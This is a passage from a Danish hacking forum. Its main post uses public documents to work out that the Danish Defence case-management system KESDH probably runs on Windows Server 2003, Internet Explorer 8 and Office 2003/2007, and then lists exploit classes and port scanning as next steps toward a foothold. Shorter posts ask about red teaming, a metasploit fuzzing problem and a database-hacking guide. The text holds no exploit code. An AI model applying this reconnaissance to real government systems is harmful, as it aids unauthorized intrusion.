2003, 64-bit and Windows XP, 64-bit. </li> </ul> Doesn't support any edition of Office 2010:<ul class="mycode_list"><li>Windows Server 2003, 64-bit </li> <li>Windows XP, 64-bit </li> </ul> </blockquote> <a href="https://technet.microsoft.com/en-us/library/ee624351.aspx%28v=office.14%29" target="_blank" rel="noopener" class="mycode_url">https://technet.microsoft.com/en-us/libr...fice.14%29</a> Som jeg ser det, ser Office ud til at være godt understøttet, lige med undtagelse af Windows 2003/XP x64. Det er dog en alt for løs antagelse, så lad os kigge lidt videre. Ved en Google-søgning fandt jeg følgende: <a href="http://medarbejdere.au.dk/search/all/?q=captia" target="_blank" rel="noopener" class="mycode_url">http://medarbejdere.au.dk/search/all/?q=captia</a> Som sagt er KESDH baseret på Captia, så det kan ikke undgås at der må være nogle ligheder. Her ses Captias installation på en Windows 7 x64-maskine, men det er stadig for løst, og vi ved jo ikke hvilken version der er omtalt: <a href="http://medarbejdere.au.dk/administration/hr/hr-systemer/esdh-systemet-captia/faq-tekniske-problemer-i-captia/installation/" target="_blank" rel="noopener" class="mycode_url">http://medarbejdere.au.dk/administration...tallation/</a> Der er flere vejledninger og dokumenter på Århus Universitets hjemmeside, men vi går i stedet direkte til kilden, scanjours.dk. Her kan vi se at der er dokumentation for 2 versioner, 4.5SP4 og 3.0SP9. <a href="http://www.scanjour.dk/support/dokumentation-captia/" target="_blank" rel="noopener" class="mycode_url">http://www.scanjour.dk/support/dokumentation-captia/</a> Hvis vi kigger på Support matrix PDF-filen, kan vi se at v4.5 understøtter både Internet Explorer 9 og Office 2010, begge i x86. Lad os i stedet gå til fanen for v3.0, og kigge på dennes tilhørende Support matrix PDF-fil. Her er de seneste understøttede versioner af Windows, Internet Explorer og Office, henholdsvis 7, 8 og 2007. Vi nærmer os noget brugbart information her, og et par Google-søgninger senere, kommer vi frem til et dokument fra Klagenævnet for Udbud, fra erhvervsstyrelsens hjemmeside: <a href="https://erhvervsstyrelsen.dk/sites/default/files/media/udbud/csc_danmark_as_mod_forsvarsministeriet_v_forsvarets_koncernfaelles_informatiktjeneste_fkit.pdf" target="_blank" rel="noopener" class="mycode_url">https://erhvervsstyrelsen.dk/sites/defau...e_fkit.pdf</a> Denne sag omhandler udbuddet af det nye it-system, og CSC der mener at KMD har haft en fordel, grundet deres opkøb af ScanJours blah blah blah.. I dokumentet kan vi igen læse om problematikken med forældede versioner af Windows, Office og IE, som ikke kan opdateret ved brug af systemer. Desuden ser vi følgende: <blockquote class="mycode_quote"><cite>Citer:</cite>Den nuværende KESDH-løsning har været i drift siden primo 2009. Så-vel servere som styreprogrammel mv. er nu utidssvarende og udgør en ”brændende platform” i relation til opretholdelse af driften af KESDH.Således vurderer FKIT, at (a) der er en høj og stigende risiko for fatalenedbrud som følge af hardware fejl, og (b) der er en reel og stigendesandsynlighed for, at nødvendigt reserveudstyr, ikke kan fremskaffes. Derudover afvikles KESDH på en driftsplatform bl.a. bestående af Windows 2003 servere, som Microsoft ophører med at supportere fra ogmed den 14. juli 2015. Hertil kommer, at den bestående driftsplatform ikke muliggør, at derkan opgraderes fra Captia version 3.0 til den seneste Captia version 4.7</blockquote> Det stemmer også over ens med nogle af de ting vi fandt tidligere, og vi kan hermed konkludere, at forsvarets IT-sagsbehandlingsprogram, KESDH, højst sandsynligt kører på et system der repræsenterer nedenstående, med mulighed for variationer: - Windows Server 2003 - Internet Explorer 8 - Office 2003/2007 Hvis man leder efter et fodfæste, som eventuelt ville kunne resultere i dybere adgang til et netværk, er denne form for information yderst værdifuld, da man her kan begynde planlægningen af et angreb, som i dette tilfælde nu kan inkludere: - Server 2003 exploits - Internet Explorer RCE drive-bys - Office 2007 exploits Om de bruger Office direkte, eller om det er integreret i deres system ved jeg ikke, men der er massere af dokumentation hvis man vil gå i dybden med det. Nu ville det så være tid til at finde de nævnte servere, og skanne for porte og services, for at få en bedre forståelse for deres infrastruktur, samt finde yderligere angrebs-vektorer. </article> <article> <h1>Red Teaming?</h1> Sun, 14 Feb 2016 22:59:22 +0100 Hej SS Jeg ville spørge om, der er nogle der er interesseret i at lave et lille Red Team? Med Red Team mener jeg bare et hold, hvor man vidensdeler, lærer og ellers har det hyggeligt med noget snik snak inde under penetration testing af netværk og andet spændende :D. (Intet ulovligt) Nogle interesserede? </article> <article> <h1>metasploit under windows xp</h1> Fri, 15 Jan 2016 03:18:32 +0100 Hej derude Jeg er i gang med at øve mig i fuzzing. Jeg følger denne video lektion: <a href="https://www.youtube.com/watch?v=TTng0EKTCgQ" target="_blank" rel="noopener" class="mycode_url">https://www.youtube.com/watch?v=TTng0EKTCgQ</a> Men der opstår et problem, når jeg skal bruge kommandoen: msfpescan kan hverken køre scriptet inde i metasploit konsollen, eller som et ruby script: ruby msfpescan Har endda prøvet at installere cygwin, og der kan jeg heller ikke få det til at virke. Håber på at der er nogle herinde der måske ved hvordan jeg skal gribe problemet an. Mvh </article> <article> <h1>hack en database?</h1> Sat, 18 Jul 2015 17:45:47 +0200 Hey jeg tænkte på om der var nogle proofs her inde der var nogle nice personer og lave en guide til at hacke databaser for kan se der flere der gerne vil lære det😛[WHITE SMILING FACE] p.s. det vil jeg sku også gerne selv </article> </main></body></html>